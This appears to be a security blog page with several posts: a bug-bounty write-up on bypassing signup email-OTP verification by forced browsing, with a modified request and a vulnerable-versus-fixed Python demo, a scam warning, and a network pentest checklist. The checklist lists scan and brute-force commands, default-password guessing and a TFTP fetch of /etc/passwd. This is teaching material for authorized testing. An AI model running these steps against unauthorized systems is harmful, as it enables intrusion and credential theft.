How to Bypass 2FA via Forced Browsing?

Today I would like to share an interesting finding by a fellow researcher, which he came across in one of the private programs: he was able to bypass the email verification step implemented by the application's signup flow.

Before getting started let me tell you about –

Forced Browsing:

Forced browsing is an attack technique against poorly protected websites and web applications that lets an attacker reach resources or steps they are not meant to access, typically by requesting a URL directly instead of arriving at it through the intended flow. It is a common web application security issue caused by careless coding, in particular by trusting the client to follow the intended sequence of requests rather than tracking that sequence on the server.


Let’s get started:

Let’s consider the target to be redacted.com.

Normal signup flow:

To create a new account, the user has to enter the 6-digit OTP sent to the email address. A valid account is created for that email address only if the user enters a valid OTP.

But via forced browsing it is possible to create a valid account for any email address without entering the OTP at all.

Exploitation:

1) Navigate to the signup page.
2) Click on "Sign up with email".
3) Fill in all the details: username, email address and password.
4) Turn ON Burp Intercept.
5) Click on "Create account".
6) Capture the POST request made to the endpoint POST /_api/signup/verify.

Now remove /verify from the request path.

In the JSON body of that POST request, add "password":"anypassword" (keeping the body valid JSON, without any syntax mistakes). The final request should look like the one shown below:

POST /_ajax/signup HTTP/1.1
Host: www.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.redacted.com/en_in/
Content-Type: application/json;charset=UTF-8
Content-Length: 94
Origin: https://www.redacted.com
DNT: 1
Connection: close

{"xxxx":"xxxxx","sxxxxe":"xx-xx-xx","email":"[email protected]","password":"[email protected]"}

Forward the modified request to the server.

Now navigate to the login page and log in with that email address and password: the account was created even though no OTP was ever entered, because the server trusted the client to have completed the verify step instead of checking that itself.
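The root cause, as an added example that is not the target's code (the handler names, the OTP format, the attempt limit and the in-memory stores are assumptions for illustration): the vulnerable handler creates an account for any well-formed signup request, so skipping the verify request costs the attacker nothing. The fixed handler creates it only when the server's own record says the OTP for that email address was verified, and consumes that record so it cannot be replayed.

```python
import hmac
import secrets
import time

OTP_TTL_SECONDS = 600   # assumption: an OTP is valid for ten minutes
MAX_OTP_ATTEMPTS = 5    # assumption: five wrong guesses invalidate the OTP


class SignupService:
    """Model of a two-step signup: request OTP -> verify OTP -> create account."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.accounts = {}   # email -> password (plaintext only to keep the demo short)
        self.pending = {}    # email -> server-side verification record

    def request_otp(self, email):
        """Step 1: generate a 6-digit OTP and record it server-side for this email."""
        otp = f"{secrets.randbelow(10 ** 6):06d}"
        self.pending[email] = {"otp": otp, "expires": self.clock() + OTP_TTL_SECONDS,
                               "attempts": 0, "verified": False}
        return otp   # in production this is emailed, never returned to the client

    def verify(self, email, otp):
        """Step 2 (the .../signup/verify request): mark the record verified on a correct OTP."""
        rec = self.pending.get(email)
        if rec is None or self.clock() > rec["expires"] or rec["attempts"] >= MAX_OTP_ATTEMPTS:
            return False
        rec["attempts"] += 1
        if hmac.compare_digest(rec["otp"], otp):   # constant-time compare
            rec["verified"] = True
            return True
        return False

    def signup_vulnerable(self, email, password):
        """Step 3 as the write-up found it: nothing checks that verify() ever succeeded,
        so a client that simply never sends the verify request still gets an account."""
        self.accounts[email] = password
        return True

    def signup_fixed(self, email, password):
        """Step 3 done right: the server's own record, not the client's navigation order,
        decides whether verification happened. The record is single-use and time-limited."""
        rec = self.pending.pop(email, None)
        if rec is None or not rec["verified"] or self.clock() > rec["expires"]:
            return False
        self.accounts[email] = password
        return True


def forced_browsing(handler_name):
    """Replay the attack: call the signup handler directly, skipping request_otp/verify.
    Returns (handler result, whether an account now exists)."""
    svc = SignupService()
    email = "victim@example.com"   # constructed demo input
    created = getattr(svc, handler_name)(email, "anypassword")
    return created, email in svc.accounts


def legitimate_flow():
    """The intended path against the fixed handler, plus a replay of the consumed record."""
    svc = SignupService()
    email = "user@example.com"     # constructed demo input
    otp = svc.request_otp(email)   # stands in for reading the OTP from the mailbox
    wrong = "000000" if otp != "000000" else "999999"
    wrong_accepted = svc.verify(email, wrong)
    verified = svc.verify(email, otp)
    created = svc.signup_fixed(email, "anypassword")
    replayed = svc.signup_fixed(email, "anypassword")   # record already consumed
    return wrong_accepted, verified, created, replayed


def expired_flow():
    """An OTP presented after OTP_TTL_SECONDS must be rejected."""
    now = [1_000.0]
    svc = SignupService(clock=lambda: now[0])
    otp = svc.request_otp("late@example.com")
    now[0] += OTP_TTL_SECONDS + 1
    return svc.verify("late@example.com", otp)


if __name__ == "__main__":
    print("vulnerable handler, verify skipped:", forced_browsing("signup_vulnerable"))
    print("fixed handler, verify skipped:     ", forced_browsing("signup_fixed"))
    print("fixed handler, legitimate flow:    ", legitimate_flow())
    print("fixed handler, expired OTP:        ", expired_flow())
```

The fix is entirely server-side state: whether the OTP was verified is stored next to the OTP itself, keyed by the email address, and the signup handler refuses to act without it. Removing the verify step from the client flow, as the write-up does, then has nothing to bypass.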

Hope you guys enjoyed it!

Delete All Facebook Messages 2021

How To Delete All Facebook Messages At Once? Working Updated Script

Most of the extensions have stopped working, or are just spam, when it comes to automating Facebook message deletion, so I made two iMacros scripts to automate the process. They will wipe out your inbox in a few minutes.
They are quite easy to use. You need to install iMacros in your browser; any browser works, Chrome or Firefox, though I prefer Chrome for a smooth run.
If you don’t know how to install the iMacros plugin, simply Google it; I don’t want to make this thread long to read.
Now you need to import the two scripts into iMacros, or just edit the default bookmarks in iMacros and replace their code with mine.
After importing the scripts, open Messenger and go to the All Conversations page.
Here you just need to run the script in a loop. Set the loop value to 100, relax, and it will wipe out your inbox.
If one script stops working, run the other, and after 100 loops run the first script again.

Beware! New Scam In Pandemic Which Involves Fake Video Calls

WARNING: Accepting friend requests from strangers on Facebook could result in loss of reputation and money. It starts with harmless text conversations and then…

There’s a new scam in town, and this one involves erotic video calls.

The gang targets only men, but women are enlisted to set the trap. First they befriend the men through Facebook chats from fake accounts. After texting for a while, a woman who is part of the gang video-calls the man and starts stripping, while encouraging him to do the same. The man follows suit, with no idea that the call is being recorded. Then, with the nude recording as leverage, the gang blackmails the victim, threatening to upload it to social media and send it to his friends and relatives.

Earlier they used to honey-trap people, but trapping them through video calls is much easier, and this has increased. They often play videos of naked women, but mostly men are the masterminds.
— Senior police officer at CEN police station

Cyber security expert Rakshi Tondon also discussed this honey trap in a recent LinkedIn video post.

Advice from Cyber Crime police:

  • Lock down your social media accounts and don’t accept requests from people you don’t know.
  • Do not text or respond to unknown numbers, and do not answer video calls from unknown callers.
  • Cover your camera with a finger if you do answer such a call.
  • Report such crimes immediately at https://cybercrime.gov.in/

Remember that these criminals are regularly caught: last year too there were many such incidents, and the gangs were traced successfully. Still, protect your privacy and do not trust strangers.

Stay Safe.


Network Security VAPT Checklist | Updated 2020

I have been working in the network security domain for the last two years and have done several network security audits covering both vulnerability assessment and penetration testing. Out of those I have put together a short technical network security assessment checklist.

Let’s talk about scope first. Suppose you are given 1000 machines for VAPT. A single machine can have up to 65535 TCP ports (and as many UDP ports) open. Any port can run any service software in the world; FTP, for example, can be served by smartftp, pureftpd and so on, and any single version (say pureftpd 1.0.22) can have a number of known vulnerabilities. Multiply all of that together and it is impossible for an auditor to probe every port and identify every service manually, let alone check every vulnerability pertaining to a single port on a single machine. Hence we have to rely on scanners such as Nexpose, Nessus, OpenVAS and Core Impact. Here are some quick tools and test cases that one can run against the commonly found ports in a network pentest.

  • Identify live hosts

o   Ping

o   Hping

o   Nmap

  • Identify OS type

o   Nmap

o   Xprobe2

o   Banner grabbing using telnet, nc (netcat)

  • Port scan

o   Nmap full TCP SYN scan of all 65535 ports with verbose mode, service detection and ping disabled. Export normal and grepable output for future use.

  • nmap -Pn -p- -sV X.X.X.X -v -sS -oG nmap_grepable_SYN -oN nmap_normal_SYN

o   Nmap top 1000 UDP ports scan with verbose mode, service detection and ping disabled (note -sU: the SYN flag -sS only scans TCP and would silently skip UDP). Export normal and grepable output for future use.

  • nmap -Pn -sU --top-ports 1000 -sV X.X.X.X -v -oG nmap_grepable_UDP -oN nmap_normal_UDP
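The grepable files written by the two commands above are what the rest of the checklist feeds into the scanner (giving Nessus only the ports nmap found open). The following script is an added example, not part of the original checklist: it parses nmap -oG output for both TCP and UDP, keeps open ports only (UDP open|filtered ports are dropped unless requested, since they usually mean "no reply"), lists the per-host service hits that drive the per-service NSE runs later in the checklist, and emits a port range string in the T:/U: syntax Nessus accepts. The two scan samples embedded in it are constructed, not real output, and the script name is an assumption.

```python
import re
import sys
from collections import defaultdict

# One grepable line per host:
# "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ..."
PORT_RE = re.compile(r"(\d+)/([^/]*)/(tcp|udp)/[^/]*/([^/]*)/[^/]*/([^/]*)/")

# Constructed samples in nmap -oG format; these are not real scan results.
SAMPLE_TCP = """# Nmap 7.91 scan initiated as: nmap -Pn -p- -sV 10.0.0.5 -v -sS -oG nmap_grepable_SYN
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.6/, 443/open/tcp//ssl|http//Apache httpd 2.4.6/, 1433/filtered/tcp//ms-sql-s///\tIgnored State: closed (65531)
"""
SAMPLE_UDP = """Host: 10.0.0.5 ()\tPorts: 53/open/udp//domain//ISC BIND 9.11.4/, 123/open/udp//ntp//NTP v4/, 161/open|filtered/udp//snmp///\tIgnored State: closed (997)
"""


def parse_grepable(text, include_open_filtered=False):
    """Return {host: {"tcp": {port: (service, version)}, "udp": {...}}} for open ports.

    UDP scans report many ports as open|filtered (no reply at all); they are left out
    unless asked for, because feeding hundreds of silent UDP ports to the scanner
    wastes the time this shortcut is meant to save."""
    hosts = defaultdict(lambda: {"tcp": {}, "udp": {}})
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open" or (include_open_filtered and state == "open|filtered"):
                hosts[host][proto][int(port)] = (service, version.strip())
    return dict(hosts)


def nessus_port_range(hosts):
    """Collapse every open port seen on any host into one Nessus-style port range string
    (T: prefix for TCP, U: prefix for UDP), e.g. "T:22,80,443,U:53,123"."""
    tcp = sorted({p for h in hosts.values() for p in h["tcp"]})
    udp = sorted({p for h in hosts.values() for p in h["udp"]})
    parts = []
    if tcp:
        parts.append("T:" + ",".join(map(str, tcp)))
    if udp:
        parts.append("U:" + ",".join(map(str, udp)))
    return ",".join(parts)


def nse_targets(hosts):
    """Per host, (host, proto, port, service) tuples: the input for per-service NSE runs
    such as --script "ssh*" on every host that has SSH open."""
    out = []
    for host, protos in sorted(hosts.items()):
        for proto in ("tcp", "udp"):
            for port, (service, _version) in sorted(protos[proto].items()):
                out.append((host, proto, port, service))
    return out


if __name__ == "__main__":
    # Usage: python nmap_ports.py nmap_grepable_SYN nmap_grepable_UDP  (no args: use the samples)
    if len(sys.argv) > 1:
        text = "".join(open(f).read() for f in sys.argv[1:])
    else:
        text = SAMPLE_TCP + SAMPLE_UDP
    found = parse_grepable(text)
    for host, proto, port, service in nse_targets(found):
        print(f"{host:16} {proto}/{port:<5} {service}")
    print("Nessus port range:", nessus_port_range(found))
```

Run it with both grepable files from the scans above; the port range line goes into the scanner's port configuration and the per-host table tells you which of the per-port sections below apply to which host.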

VA (Vulnerability Assessment)

o   Use Nessus with the below profile:

  • DoS plugins disabled
  • Web application scan enabled
  • SSL/TLS scan on every port instead of only the known ports
  • Both TCP and UDP scanning enabled
  • Give only the list of open ports (TCP and UDP) that nmap found, rather than the full port range, in the port scan configuration. This saves time, particularly when the number of IPs is large and the time for the audit and report is short.

o   Use Nexpose

o   Use OpenVAS

o   Use nmap NSE scripts against specific open ports with the below command.

  • For example, if port 22 (SSH) is open and you want to run all scripts pertaining to SSH:

nmap -Pn -sS -p22 --script "ssh*" -v X.X.X.X

If you are not sure about the exact script name, use * to run every script whose name starts with the ‘ssh’ keyword; quote the pattern so the shell does not expand it against files in the current directory.

  • Audit SSL/TLS

o   Use openssl and sslyze to find the below issues:

  • Self-signed certificate
  • SSL version 2 and 3 support
  • Weak hashing algorithm (e.g. MD5 or SHA-1 certificate signatures)
  • Use of RC4 and CBC-mode ciphers
  • Logjam (weak or export-grade Diffie-Hellman)
  • Sweet32 (64-bit block ciphers such as 3DES)
  • Certificate expiry
  • OpenSSL ChangeCipherSpec (CCS injection) issue
  • POODLE vulnerability
  • OpenSSL Heartbleed issue

  • Check for default passwords in server/device/service documentation

o   Let’s say during your port scan or VA you found some services running on the server, for example a Cisco device, Brocade Fabric OS, a SonicWall firewall or Apache Tomcat Manager. Google the default administrative username and password for those products, try them on the login and check your luck.
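An added example, not from the original checklist, of how to drive the protocol and cipher items above from Python's standard library; the check names, cipher strings and the name-based classifier are my assumptions, and sslyze and openssl s_client remain the reference tools. It attempts one narrow handshake per check and reports what the server accepted, and the classifier maps an accepted suite name back to the checklist findings. Caveat: a modern OpenSSL cannot offer SSLv2, SSLv3 or export suites at all, so those rows come back as untestable rather than absent, and Heartbleed, CCS injection and certificate signature algorithms are not covered here (use sslyze or the nmap ssl-heartbleed and ssl-ccs-injection scripts).

```python
import socket
import ssl
import sys

AEAD_MARKERS = ("GCM", "CCM", "CHACHA20", "POLY1305")


def classify_cipher(name):
    """Map an OpenSSL cipher-suite name to the checklist findings it triggers.
    Name-based heuristic: OpenSSL omits 'CBC' from most CBC suite names, so anything
    that is neither AEAD, RC4 nor NULL is treated as CBC."""
    n = name.upper()
    findings = set()
    if "RC4" in n:
        findings.add("RC4")
    if "3DES" in n or "DES-CBC3" in n:
        findings.add("Sweet32 (64-bit block cipher)")
    if "EXP" in n:
        findings.add("export-grade (Logjam/FREAK class)")
    if "MD5" in n:
        findings.add("weak hash (MD5 MAC)")
    if "NULL" in n or n.startswith(("ADH", "AECDH")):
        findings.add("no encryption or no authentication")
    if not any(m in n for m in AEAD_MARKERS) and "RC4" not in n and "NULL" not in n:
        findings.add("CBC mode")
    return sorted(findings)


def try_handshake(host, port, min_version, max_version, ciphers, timeout=5):
    """Offer exactly one protocol window and cipher set. Returns (version, cipher) if the
    server accepts it, None if it refuses, or "untestable" if local OpenSSL cannot offer it."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False           # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE      # auditing the server, not trusting it
    try:
        ctx.minimum_version = min_version
        ctx.maximum_version = max_version
        ctx.set_ciphers(ciphers)         # @SECLEVEL=0 re-enables legacy suites on OpenSSL 1.1+
    except (ssl.SSLError, ValueError):
        return "untestable"
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                cipher, version, _bits = tls.cipher()
                return version, cipher
    except ssl.SSLError as e:
        # "no protocols available" means our own OpenSSL has that version compiled out
        return "untestable" if "NO_PROTOCOLS_AVAILABLE" in str(e) else None
    except OSError:
        return None


def certificate_problem(host, port, timeout=5):
    """Verify the chain against the system trust store; return the failure reason
    (self-signed, expired, hostname mismatch, ...) or None if it verifies."""
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host):
                return None
    except ssl.SSLCertVerificationError as e:
        return e.verify_message
    except (ssl.SSLError, OSError) as e:
        return f"handshake failed: {e}"


V = ssl.TLSVersion
CHECKS = [  # (finding, min version, max version, OpenSSL cipher string); assumed mapping
    ("SSLv3 offered (POODLE)",          V.SSLv3,   V.SSLv3,   "ALL:@SECLEVEL=0"),
    ("TLS 1.0 offered",                 V.TLSv1,   V.TLSv1,   "ALL:@SECLEVEL=0"),
    ("TLS 1.1 offered",                 V.TLSv1_1, V.TLSv1_1, "ALL:@SECLEVEL=0"),
    ("RC4 accepted",                    V.TLSv1,   V.TLSv1_2, "RC4:@SECLEVEL=0"),
    ("3DES accepted (Sweet32)",         V.TLSv1,   V.TLSv1_2, "3DES:@SECLEVEL=0"),
    ("export suites accepted (Logjam)", V.TLSv1,   V.TLSv1_2, "EXPORT:@SECLEVEL=0"),
    ("CBC suites accepted",             V.TLSv1,   V.TLSv1_2, "AES128-SHA:AES256-SHA:DES-CBC3-SHA:@SECLEVEL=0"),
]


def audit(host, port=443):
    """Run every check; returns a list of (finding, result) tuples."""
    results = [("certificate", certificate_problem(host, port))]
    for finding, lo, hi, ciphers in CHECKS:
        results.append((finding, try_handshake(host, port, lo, hi, ciphers)))
    return results


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: tls_audit.py host [port]")
    for finding, result in audit(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443):
        if isinstance(result, tuple):
            tags = ", ".join(classify_cipher(result[1])) or "no name-based finding"
            result = f"ACCEPTED {result[0]} {result[1]} [{tags}]"
        print(f"{finding:34} {result}")
```

Read "untestable" as "check this one with sslyze or an older openssl build", never as "not vulnerable"; a scanner run from a hardened jump host can miss SSLv3 and export suites entirely for this reason.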

  • Hunting some common ports

o   DNS (53) UDP

  • Examine the domain name system (DNS) using dnsenum, nslookup, dig and fierce
  • Check for zone transfer (AXFR)
  • Brute-force subdomains using the fierce tool
  • Run all nmap DNS scripts: nmap -Pn -sU -p53 --script "dns*" -v X.X.X.X
  • Banner grabbing and finding publicly known exploits
  • Check whether the server is an open recursive resolver that could be abused for DNS amplification attacks

o   SMTP (25) TCP

  • Check for SMTP open relay
  • Check for email spoofing (e.g. missing or lax SPF/DMARC records)
  • Check for username enumeration using the VRFY command (also EXPN and RCPT TO)
  • Banner grabbing and finding publicly known exploits
  • Send crypted/packed test attachments and check whether the SMTP gateway is able to detect and block them
  • Run all nmap SMTP scripts: nmap -Pn -sS -p25 --script "smtp*" -v X.X.X.X

o   SNMP (161) UDP

  • Check for the default community strings ‘public’ and ‘private’ using snmpwalk and the snmpenum.pl script.
  • Banner grabbing and finding publicly known exploits
  • Perform MIB enumeration. .1.3.6.1.2.1.1.5 (sysName) is standard MIB-2 and answers on any device; the OIDs under .1.3.6.1.4.1.77 belong to the Windows LAN Manager MIB and only return data from Windows hosts.
  • .1.3.6.1.2.1.1.5 Hostnames
  • .1.3.6.1.4.1.77.1.4.2 Domain Name
  • .1.3.6.1.4.1.77.1.2.25 Usernames
  • .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  • .1.3.6.1.4.1.77.1.2.27 Share Information

o   SSH (22) TCP

  • Banner grabbing and finding publicly known exploits
  • Check whether SSH protocol version 1 is supported.
  • Brute-force passwords using hydra and medusa
  • Check whether weak CBC ciphers and HMAC algorithms are supported using the ssh2-enum-algos.nse nmap script.
  • Run all nmap SSH scripts: nmap -Pn -sS -p22 --script "ssh*" -v X.X.X.X

o   IKE/IPsec VPN, e.g. Cisco VPN (500) UDP

  • Check whether aggressive mode and main mode are enabled using the ike-scan tool.
  • Enumerate using the IKEProbe tool
  • Check for the VPN group name; if aggressive mode is enabled, capture the PSK hash with ike-scan (aggressive mode with the --pskcrack option) and crack it with psk-crack, in order to obtain credentials to log in to the VPN service through the web panel.

o   SMB (445, 139 TCP) and NetBIOS (137 UDP)

o   FTP (21) TCP

  • Run all nmap FTP scripts: nmap -Pn -sS -p21 --script "ftp*" -v X.X.X.X
  • Check for cleartext password submission on FTP login (no FTPS / AUTH TLS)
  • Check for anonymous access using anonymous:anonymous as username and password
  • Banner grabbing and finding publicly known exploits
  • Brute-force FTP passwords using hydra and medusa

o   Telnet (23) TCP

  • Banner grabbing and finding publicly known exploits
  • Bruteforce telnet password
  • Run the following nmap scripts:
  • telnet-brute.nse
  • telnet-encryption.nse
  • telnet-ntlm-info.nse

o   TFTP (69) UDP

  • TFTP enumeration
  • tftp ip_address PUT local_file
  • tftp ip_address GET conf.txt (or other files)
  • tftp -i ip_address GET /etc/passwd (old Solaris)
  • Brute-force file names using a TFTP bruteforcer tool
  • Run the tftp-enum.nse nmap script
  • Banner grabbing and finding publicly known exploits

o   RPC (111) TCP/UDP

  • Banner grabbing and finding publicly known exploits
  • Run the following nmap scripts:
  • bitcoinrpc-info.nse
  • metasploit-msgrpc-brute.nse
  • metasploit-xmlrpc-brute.nse
  • msrpc-enum.nse
  • nessus-xmlrpc-brute.nse
  • rpcap-brute.nse
  • rpcap-info.nse
  • rpc-grind.nse
  • rpcinfo.nse
  • xmlrpc-methods.nse
  • Perform RPC enumeration using rpcinfo -p ip_address
  • Check for exported NFS directories using showmount -e ip_address; exports readable by everyone can leak data.

o   NTP (123) UDP

  • Perform NTP enumeration using the below commands:
  • ntpdc -c monlist IP_ADDRESS
  • ntpdc -c sysinfo IP_ADDRESS
  • Run all nmap NTP scripts (UDP port 123, not TCP 21): nmap -Pn -sU -p123 --script "ntp*" -v X.X.X.X

o   HTTP/HTTPS (80, 443, 8080, 8443) TCP

  • Banner grabbing from the Server header in the Burp response, and finding publicly known exploits
  • Run Nikto and dirb
  • Run all nmap HTTP scripts on the web ports: nmap -Pn -sS -p80,443,8080,8443 --script "http*" -v X.X.X.X

o   MS SQL Server (1433 TCP, 1434 UDP) and MySQL (3306 TCP)

  • Banner grabbing and finding publicly known exploits
  • Brute-force and perform other operations using the following tools:
  • Piggy
  • SQLping
  • SQLpoke
  • SQLrecon
  • SQLver
  • Run the following nmap scripts:
  • ms-sql-brute.nse
  • ms-sql-config.nse
  • ms-sql-dac.nse
  • ms-sql-dump-hashes.nse
  • ms-sql-empty-password.nse
  • ms-sql-hasdbaccess.nse
  • ms-sql-info.nse
  • ms-sql-ntlm-info.nse
  • ms-sql-query.nse
  • ms-sql-tables.nse
  • ms-sql-xp-cmdshell.nse
  • pgsql-brute.nse (PostgreSQL, port 5432)
  • For MySQL, the default username is root and the password is

o   Oracle (1521) TCP

  • Enumeration using the following tools:
  • tnsver [host] [port]
  • tnscmd:

o   perl tnscmd.pl -h ip_address

o   perl tnscmd.pl version -h ip_address

o   perl tnscmd.pl status -h ip_address

  • Enumeration and brute-force using the below nmap scripts:
  • oracle-brute.nse
  • oracle-brute-stealth.nse
  • oracle-enum-users.nse
  • oracle-sid-brute.nse
  • oracle-tns-version.nse

o   RDP (3389) TCP

  • Enumerate by connecting and examining the login screen; gather all active usernames and domain/group names.
  • Perform an RDP cryptography check using the rdp-sec-check.pl script.
  • Run the following nmap scripts:
  • rdp-enum-encryption.nse
  • rdp-vuln-ms12-020.nse

o   SIP (5060) UDP/TCP

  • Enumeration through the following commands:
  • Sipflanker: python sipflanker.py 192.168.1-254
  • Sipscan / Smap: smap -l IP_Address